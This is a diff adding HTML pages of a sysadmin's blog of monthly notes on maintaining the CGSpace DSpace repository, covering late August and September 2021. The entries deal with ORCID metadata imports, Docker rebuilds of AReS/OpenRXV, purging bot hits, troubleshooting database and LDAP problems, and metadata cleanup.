+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-08-25-add-orcids.csv 
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Chege, Christine G. Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
+</span></span><span style="display:flex;"><span>&#34;Chege, Christine Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
+</span></span><span style="display:flex;"><span>&#34;Kiria, C.&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
+</span></span><span style="display:flex;"><span>&#34;Kinyua, Ivy&#34;,&#34;Ivy Kinyua :0000-0002-1978-8833&#34;
+</span></span><span style="display:flex;"><span>&#34;Rahn, E.&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
+</span></span><span style="display:flex;"><span>&#34;Rahn, Eric&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
+</span></span><span style="display:flex;"><span>&#34;Jager M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
+</span></span><span style="display:flex;"><span>&#34;Jager, M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
+</span></span><span style="display:flex;"><span>&#34;Jager, Matthias&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
+</span></span><span style="display:flex;"><span>&#34;Waswa, Boaz&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
+</span></span><span style="display:flex;"><span>&#34;Waswa, Boaz S.&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
+</span></span><span style="display:flex;"><span>&#34;Rivera, Tatiana&#34;,&#34;Tatiana Rivera: 0000-0003-4876-5873&#34;
+</span></span><span style="display:flex;"><span>&#34;Andrade, Robert&#34;,&#34;Robert Andrade: 0000-0002-5764-3854&#34;
+</span></span><span style="display:flex;"><span>&#34;Ceccarelli, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
+</span></span><span style="display:flex;"><span>&#34;Ceccarellia, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
+</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
+</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia S.&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
+</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia Sarah&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
+</span></span><span style="display:flex;"><span>&#34;Groot, J.C.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
+</span></span><span style="display:flex;"><span>&#34;Groot, J.C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
+</span></span><span style="display:flex;"><span>&#34;Groot, Jeroen C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
+</span></span><span style="display:flex;"><span>&#34;Groot, Jeroen CJ&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
+</span></span><span style="display:flex;"><span>&#34;Abera, W.&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
+</span></span><span style="display:flex;"><span>&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
+</span></span><span style="display:flex;"><span>&#34;Kanyenga Lubobo, Antoine&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
+</span></span><span style="display:flex;"><span>&#34;Lubobo Antoine, Kanyenga&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34; 
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><h2 id="2021-08-29">2021-08-29</h2>
+<ul>
+<li>Run a full harvest on AReS</li>
+<li>Also do more work the past few days on OpenRXV
+<ul>
+<li>I switched the backend target from ES2017 to ES2019</li>
+<li>I did a proof of concept with multi-stage builds and simplifying the Docker configuration</li>
+</ul>
+</li>
+<li>Update the list of ORCID identifiers on CGSpace</li>
+<li>Run system updates and reboot CGSpace (linode18)</li>
+</ul>
+<h2 id="2021-08-31">2021-08-31</h2>
+<ul>
+<li>Yesterday I finished the work to make OpenRXV use a new multi-stage Docker build system and use smarter <code>COPY</code> instructions instead of runtime volumes
+<ul>
+<li>Today I merged the changes to the master branch and re-deployed AReS on linode20</li>
+<li>Because the <code>docker-compose.yml</code> moved to the root the Docker volume prefix changed from <code>docker_</code> to <code>openrxv_</code> so I had to stop the containers and rsync the data from the old volume to the new one in /var/lib/docker</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-09/index.html b/docs/2021-09/index.html
new file mode 100644
index 000000000..145345f55
--- /dev/null
+++ b/docs/2021-09/index.html
@@ -0,0 +1,642 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2021" />
+<meta property="og:description" content="2021-09-02
+
+Troubleshooting the missing Altmetric scores on AReS
+
+Turns out that I didn&rsquo;t actually fix them last month because the check for content.altmetric still exists, and I can&rsquo;t access the DOIs using _h.source.DOI for some reason
+I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
+I will change DOI to tomato in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;
+Even as tomato I can&rsquo;t access that field as _h.source.tomato in Angular, but it does work as a filter source&hellip; sigh
+
+
+I&rsquo;m having problems using the OpenRXV API
+
+The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search query properly&hellip;
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-09/" />
+<meta property="article:published_time" content="2021-09-01T09:14:07+03:00" />
+<meta property="article:modified_time" content="2021-10-04T11:10:54+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2021"/>
+<meta name="twitter:description" content="2021-09-02
+
+Troubleshooting the missing Altmetric scores on AReS
+
+Turns out that I didn&rsquo;t actually fix them last month because the check for content.altmetric still exists, and I can&rsquo;t access the DOIs using _h.source.DOI for some reason
+I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
+I will change DOI to tomato in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;
+Even as tomato I can&rsquo;t access that field as _h.source.tomato in Angular, but it does work as a filter source&hellip; sigh
+
+
+I&rsquo;m having problems using the OpenRXV API
+
+The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search query properly&hellip;
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-09/",
+  "wordCount": "2864",
+  "datePublished": "2021-09-01T09:14:07+03:00",
+  "dateModified": "2021-10-04T11:10:54+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-09/">
+
+    <title>September, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-09/">September, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-09-01T09:14:07+03:00">Wed Sep 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-09-02">2021-09-02</h2>
+<ul>
+<li>Troubleshooting the missing Altmetric scores on AReS
+<ul>
+<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li>
+<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li>
+<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li>
+<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li>
+</ul>
+</li>
+<li>I&rsquo;m having problems using the OpenRXV API
+<ul>
+<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search query properly&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-05">2021-09-05</h2>
+<ul>
+<li>Update Docker images on AReS server (linode20) and rebuild OpenRXV:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose build
+</span></span></code></pre></div><ul>
+<li>Then run system updates and reboot the server
+<ul>
+<li>After the system came back up I started a fresh re-harvesting</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-07">2021-09-07</h2>
+<ul>
+<li>Checking last month&rsquo;s Solr statistics to see if there are any new bots that I need to purge and add to the list
+<ul>
+<li>78.203.225.68 made 50,000 requests on one day in August, and it is using this user agent: <code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</code></li>
+<li>It&rsquo;s a fixed line ISP in Montpellier according to AbuseIPDB.com, and has not been flagged as abusive, so it must be some CGIAR SMO person doing some web application harvesting from the browser</li>
+<li>130.255.162.154 is in Sweden and made 46,000 requests in August and it is using this user agent: <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0</code></li>
+<li>35.174.144.154 is on Amazon and made 28,000 requests with this user agent: <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36</code></li>
+<li>192.121.135.6 is in Sweden and made 9,000 requests with this user agent: <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0</code></li>
+<li>185.38.40.66 is in Germany and made 6,000 requests with this user agent: <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 BoldBrains SC/1.10.2.4</code></li>
+<li>3.225.28.105 is in Amazon and made 3,000 requests with this user agent: <code>Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36</code></li>
+<li>I also noticed that we still have tons (25,000) of requests by MSNbot using this normal-looking user agent: <code>Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</code></li>
+<li>I can identify them by their reverse DNS: msnbot-40-77-167-105.search.msn.com.</li>
+<li>I had already purged a bunch of these by their IPs in 2021-06, so it looks like I have to do that again</li>
+<li>While looking at the MSN requests I noticed tons of requests from another strange host using reverse IP DNS: malta2095.startdedicated.com., astra5139.startdedicated.com., and many others</li>
+<li>They must be related, because I see them all using the exact same user agent: <code>Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</code></li>
+<li>So this startdedicated.com DNS is some Bing bot also&hellip;</li>
+</ul>
+</li>
+<li>I extracted all the IPs and purged them using my <code>check-spider-ip-hits.sh</code> script
+<ul>
+<li>In total I purged 225,000 hits&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-12">2021-09-12</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2021-09-13">2021-09-13</h2>
+<ul>
+<li>Mishell Portilla asked me about thumbnails on CGSpace being small
+<ul>
+<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/114576">10568/114576</a> has a lot of white space on the left side</li>
+<li>I created a new thumbnail with vipsthumbnail:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Looking at the PDF&rsquo;s metadata I see:
+<ul>
+<li>Producer: iLovePDF</li>
+<li>Creator: Adobe InDesign 15.0 (Windows)</li>
+<li>Format: PDF-1.7</li>
+</ul>
+</li>
+<li>Eventually I should do more tests on this and perhaps file a bug with DSpace&hellip;</li>
+<li>Some Alliance people contacted me about getting access to the CGSpace API to deposit with their TIP tool
+<ul>
+<li>I told them I can give them access to DSpace Test and that we should have a meeting soon</li>
+<li>We need to figure out what controlled vocabularies they should use</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-14">2021-09-14</h2>
+<ul>
+<li>Some people from the Alliance contacted me last week about AICCRA metadata
+<ul>
+<li>They have internal things called Components and Clusters, so they were asking how to store these in CGSpace</li>
+<li>I suggested adding new metadata values: <code>cg.subject.aiccraComponent</code> and <code>cg.subject.aiccraCluster</code></li>
+<li>On second thought, these are identifiers so perhaps this is better: <code>cg.identifier.aiccraComponent</code> and <code>cg.identifier.aiccraCluster</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-15">2021-09-15</h2>
+<ul>
+<li>Add ORCID identifier for new ILRI staff to our controlled vocabualary
+<ul>
+<li>Also tag their twenty-five existing items on CGSpace:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-09-15-add-orcids.csv                                                                                  
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Kotchofa, Pacem&#34;,&#34;Pacem Kotchofa: 0000-0002-1640-8807&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
+<ul>
+<li>I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using</li>
+<li>I also told them that I would create some documentation listing the metadata fields, which are mandatory, and the respective controlled vocabularies</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-16">2021-09-16</h2>
+<ul>
+<li>Start writing a Python script to parse <code>input-forms.xml</code> to create documentation for submissions
+<ul>
+<li>Found a bug with the DSpace 6.3 REST API, it returns HTTP 500 for <code>dc.title</code> even though it exists in the registry: <a href="https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/title">https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/title</a></li>
+<li>Seems to be with any field that does not have a qualifier</li>
+<li>I filed an issue: <a href="https://github.com/DSpace/DSpace/issues/7946">https://github.com/DSpace/DSpace/issues/7946</a></li>
+</ul>
+</li>
+<li>I decided to update all the metadata field descriptions in our registry so I can use that instead of the &ldquo;hint&rdquo; for each field in the input form
+<ul>
+<li>I will include examples as well so that it becomes a better resource</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-17">2021-09-17</h2>
+<ul>
+<li>I filed <a href="https://github.com/AgriculturalSemantics/cg-core/issues/41">an issue about using SPDX License Identifiers in CG Core v2</a></li>
+<li>Peter Ballantyne emailed me to say that CGSpace was very slow
+<ul>
+<li>The front page was returning a blank white page</li>
+<li>I looked at the database and the connections look low:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>63
+</span></span></code></pre></div><ul>
+<li>Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin</li>
+<li>But the DSpace log file shows tons of database issues:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-17 
+</span></span><span style="display:flex;"><span>14779
+</span></span></code></pre></div><ul>
+<li>The earliest one I see is around midnight (now is 2PM):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-09-17 00:01:49,572 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
+</span></span><span style="display:flex;"><span>2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
+</span></span></code></pre></div><ul>
+<li>But I was definitely logged into the site this morning so there were no issues then&hellip;</li>
+<li>It seems that a few errors are normal, but there&rsquo;s obviously something wrong today:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-*
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-01:116
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-02:163
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-03:77
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-04:13
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-05:310
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-06:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-07:29
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-08:86
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-09:24
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-10:26
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-11:12
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-12:5
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-13:10
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-14:102
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-15:542
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-16:368
+</span></span><span style="display:flex;"><span>dspace.log.2021-09-17:15235
+</span></span></code></pre></div><ul>
+<li>I restarted the server and DSpace came up fine&hellip; so it must have been some kind of fluke</li>
+<li>Continue working on cleaning up and annotating the metadata registry on CGSpace
+<ul>
+<li>I removed two old metadata fields that we stopped using earlier this year with the CG Core v2 migration: <code>cg.targetaudience</code> and <code>cg.title.journal</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-18">2021-09-18</h2>
+<ul>
+<li>Make more progress on parsing and documenting the CGSpace submission form
+<ul>
+<li>Publish on GitHub: <a href="https://github.com/ilri/cgspace-submission-guidelines">https://github.com/ilri/cgspace-submission-guidelines</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-19">2021-09-19</h2>
+<ul>
+<li>Improve CGSpace Submission Guidelines metadata parsing and documentation
+<ul>
+<li>GitHub Pages is live now: <a href="https://ilri.github.io/cgspace-submission-guidelines/">https://ilri.github.io/cgspace-submission-guidelines/</a></li>
+</ul>
+</li>
+<li>Start a full harvest on AReS
+<ul>
+<li>The harvest completed successfully, but for some reason there were only 92,000 items&hellip;</li>
+<li>I updated all Docker images, rebuilt the application, then ran all system updates and rebooted the system:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose build
+</span></span></code></pre></div><h2 id="2021-09-20">2021-09-20</h2>
+<ul>
+<li>I synchronized the production CGSpace PostreSQL, Solr, and Assetstore data with DSpace Test</li>
+<li>Over the weekend a few users reported that they could not log into CGSpace
+<ul>
+<li>I checked LDAP and it seems there is something wrong:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap-account@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=someaccountnametocheck)&#34;</span>
+</span></span><span style="display:flex;"><span>Enter LDAP Password: 
+</span></span><span style="display:flex;"><span>ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
+</span></span></code></pre></div><ul>
+<li>I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
+<ul>
+<li>It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decomissioned the old one last week</li>
+<li>I updated the configuration on CGSpace and confirmed that it is working</li>
+</ul>
+</li>
+<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
+<ul>
+<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
+</ul>
+</li>
+<li>Run <code>dspace cleanup -v</code> process on CGSpace to clean up old bitstreams</li>
+<li>Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 80901
+</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 1274
+</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 8091
+</span></span></code></pre></div><h2 id="2021-09-23">2021-09-23</h2>
+<ul>
+<li>Peter sent me back the corrections for the affiliations
+<ul>
+<li>It is about 1,280 corrections and fourteen deletions</li>
+<li>I cleaned them up in csv-metadata-quality and then extracted the deletes and fixes to separate files to run with <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
+</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> /tmp/affiliations.csv &gt; /tmp/affiliations-delete.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -r <span style="color:#e6db74">&#39;^.+$&#39;</span> /tmp/affiliations.csv | csvgrep -i -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> &gt; /tmp/affiliations-fix.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">211</span>
+</span></span><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -m <span style="color:#ae81ff">211</span>
+</span></span></code></pre></div><ul>
+<li>Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:</li>
+</ul>
